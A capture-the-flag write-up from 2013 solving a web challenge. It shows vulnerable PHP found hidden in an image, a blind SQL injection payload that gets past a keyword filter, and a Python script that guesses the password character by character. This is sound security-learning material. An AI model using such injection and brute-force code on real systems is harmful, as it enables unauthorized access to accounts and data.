forbiddenBits 2013 WriteUp: ment0rpwnage

March 21, 2013

Write up: Ment0rPwnage Part 1

TLDR: Downloading the wallpaper reveals hidden PHP-code which allows to inject SQL-statements. This enables guessing username and password char by char for the login-area found in the robots.txt

Ok this challenge was a fun one, it combined a lot of different aspects of IT-sec. First things first: When starting the challenge one is presented with a webpage. It shows the famous quote by John Nunemaker about hackers and their green text on black terminals ;).  It also featured a long text with no relevant information on the task (at least when first skimming it).  A quick check in the robots.txt reveals a login page: 4dm1n_1337_p0rt4l. But there is no way to guess a username and password. What to do now? When looking at the long text on the front page it is striking that there are some harsh typos in it. After quickly googling for the original text and comparing it char by char the misspelled words build an anagram for: “I love metadata”. Ok this may help. But where to find metadata? The most common source for metadata are images and there is only one image on this page: the wallpaper with the quote. After downloading it the first thing to do was to use strings on it. And this reveals something very interesting:

  <?php
    include("config.php");
    if(isset($_GET['id'])) {
      $id = @$_GET['id'];
      $message="";
      $rm_trash = preg_replace('#\/\*.*\*\/#U','',$id);
      // written by genius don't try to understand
      if(!preg_match('#^[^0-9]#',$rm_trash)) {
        // and you thought you can inject me?haha
        if(!preg_match("#union|sub|lenght|case|convert|having|and|like|
        bench|sleep|mid|if|file|into|str|char|'|,#i", $rm_trash)){
          $req = mysql_query("SELECT * FROM users WHERE id=$rm_trash");
          if(@mysql_num_rows($req)!=0)
            $message = "Sure, we have it in database";
          else
            $message="Houston, we have a problem!";
        }
        else
          $message="Houston, we have a filter!";
      }
    }
  ?>

So the picture injects some PHP-code into the page. A quick test with “?id=0” gets us the “Houston, we have a problem!” message clearly visible in the source code. We also observe that user input is evaluated with just using regular expressions as a filter. A SQL-Injection is possible. But a lot of keywords are blocked including “like” which would help a lot (it is also noteworthy that length was not excluded because it has a typo in the source code). To replace the like statement we used the position command. It returns the position of a characters/strings first appearance in a string. So by using a statement like this:

88.190.221.115/?id=0 or(select position(a in p4ssword)-1 from users)

We were able to guess things char by char. This was used to first guess the names of columns in the table (usern4me and p4ssword), then the username (teh_ment0r) and the password (ff8211a471051fd7f1be4c0b5917b860). The password could be submitted as a flag and earned us 200 points. This was the first part of the challenge.

Python-Script for password guessing:

import requests
password = ""
abc = ["a","b","c","d","e","f","0","1","2","3","4","5","6","7","8","9"]
for i in range(1,33):
  for x in abc:
    r = requests.get("http://88.190.221.115/?id=0 or (select position(\"" + password+x + "\" in p4ssword) - 1 from users)")
    txt = r.text
    print r.url
    if "Houston, we have a problem!" in txt:
      print x
      password+= x
print password

2 Responses to “forbiddenBits 2013 WriteUp: ment0rpwnage”

  1. Can you upload HTML code as well? I mean, I would like to try it soon in localhost

  2. I’m sorry, I do not have the source for the challenge. Maybe you can try contacting the organizer of the CTF?

Leave a Reply




Get Adobe Flash player